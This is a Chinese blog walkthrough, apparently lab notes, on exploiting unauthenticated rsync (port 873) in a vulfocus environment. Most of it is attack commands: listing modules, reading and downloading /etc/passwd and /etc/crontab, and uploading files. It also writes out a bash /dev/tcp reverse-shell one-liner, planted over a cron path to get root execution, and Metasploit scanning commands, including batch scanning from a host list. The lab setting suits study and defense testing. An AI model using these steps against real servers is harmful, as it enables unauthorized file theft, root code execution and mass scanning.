rsync未授权-873

环境搭建

https://www.freebuf.com/articles/web/278245.html

rsync: /vulhub/rsync/common/ -https://blog.csdn.net/weixin_45006525/article/details/123873166

vulfocus

docker pull vulfocus/vulfocus:latest
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=192.168.40.130 vulfocus/vulfocus

image-20240310120902374

rsync-873 √

基础了解

rsync是Linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他SSH、rsync主机同步。

漏洞利用

测试漏洞存在:

rsync rsync://192.168.40.130:60522

image-20240310121012614

查看文件:

rsync rsync://192.168.40.130:60522/src/etc/passwd

image-20240310121109860

下载文件:

rsync rsync://192.168.40.130:60522/src/etc/passwd ./passwd

image-20240310121150414

上传文件:

rsync ceshi.txt rsync://192.168.40.130:60522/src/ceshi.txt

image-20240310121458616

计划任务反弹shell:

# 读取计划任务
rsync rsync://192.168.40.130:60522/src/etc/crontab /tmp/cron.txt

# 查看计划任务
cat /tmp/cron.txt

image-20240310121904209

计划任务中有这么一行:17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
含义:每小时的第17分钟,以root用户的身份执行/etc/cron.hourly文件

所以接下来就是将反弹shell的文件替代/etc/cron.hourly

# 创建文件 shell
/bin/bash -i >& /dev/tcp/192.168.40.130/2333 0>&1
# 上传并覆盖/etc/hourly
rsync -av shell rsync://192.168.40.130:60522/src/etc/hourly

image-20240310122605762

开始监听并等待17分钟接收shell即可

msf利用

探测:

image-20240310124837487

use scanner/rsync/modules_list
set rhosts 192.168.40.130
set rport 39367
show options
run

image-20240310124933315

批量:

set rhosts file:/tmp/list

image-20240310150155211

posted @ 2024-10-16 12:37  starme  阅读(5)  评论(0编辑  收藏  举报